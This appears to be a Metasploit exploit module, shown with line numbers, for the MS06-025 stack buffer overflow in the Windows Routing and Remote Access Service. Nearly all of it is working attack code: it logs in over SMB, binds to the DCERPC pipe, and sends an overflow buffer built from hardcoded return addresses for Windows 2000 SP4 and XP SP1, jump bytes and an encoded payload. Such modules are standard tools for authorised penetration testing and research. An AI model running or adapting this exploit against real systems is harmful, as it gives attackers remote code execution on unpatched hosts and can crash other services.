Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'MS06-025 Microsoft RRAS Service Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the Windows Routing and Remote
17
        Access Service. Since the service is hosted inside svchost.exe, a failed
18
        exploit attempt can cause other system services to fail as well. A valid
19
        username and password is required to exploit this flaw on Windows 2000.
20
        When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
21
      'Author'         =>
22
        [
23
          'Nicolas Pouvesle <nicolas.pouvesle[at]gmail.com>',
24
          'hdm'
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          [ 'CVE', '2006-2370' ],
30
          [ 'OSVDB', '26437' ],
31
          [ 'BID', '18325' ],
32
          [ 'MSB', 'MS06-025' ]
33
        ],
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'thread',
37
        },
38
      'Privileged'     => true,
39
      'Payload'        =>
40
        {
41
          'Space'    => 1104,
42
          'BadChars' => "\x00",
43
          'StackAdjustment' => -3500,
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
49
          [ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
50
        ],
51

52
      'DisclosureDate' => '2006-06-13'))
53

54
    register_options(
55
      [
56
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
57
      ])
58

59
    deregister_options('SMB::ProtocolVersion')
60
  end
61

62
  # Post authentication bugs are rarely useful during automation
63
  def autofilter
64
    false
65
  end
66

67
  def exploit
68

69
    connect(versions: [1])
70
    smb_login()
71

72
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
73

74
    print_status("Binding to #{handle} ...")
75
    dcerpc_bind(handle)
76
    print_status("Bound to #{handle} ...")
77

78

79
    print_status('Getting OS...')
80

81
    # Check the remote OS name and version
82
    os = smb_peer_os
83
    pat = ''
84

85
    case os
86
    when /Windows 5\.0/
87
      pat =
88
        payload.encoded +
89
        "\xeb\x06" +
90
        rand_text_alphanumeric(2) +
91
        [target.ret].pack('V') +
92
        "\xe9\xb7\xfb\xff\xff"
93
      os = 'Windows 2000'
94
    when /Windows 5\.1/
95
      pat =
96
        rand_text_alphanumeric(0x4c) +
97
        "\xeb\x06" +
98
        rand_text_alphanumeric(2) +
99
        [target.ret].pack('V') +
100
        payload.encoded
101
      os = 'Windows XP'
102
    end
103

104
    req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
105
    len = req.length
106
    stb =
107
      NDR.long(0x20000) +
108
      NDR.long(len) +
109
      req           +
110
      NDR.long(len)
111

112
    print_status("Calling the vulnerable function on #{os}...")
113

114
    begin
115
      dcerpc.call(0x0C, stb)
116
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
117
    rescue => e
118
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
119
        raise e
120
      end
121
    end
122

123
    # Cleanup
124
    handler
125
    disconnect
126
  end
127
end
128

129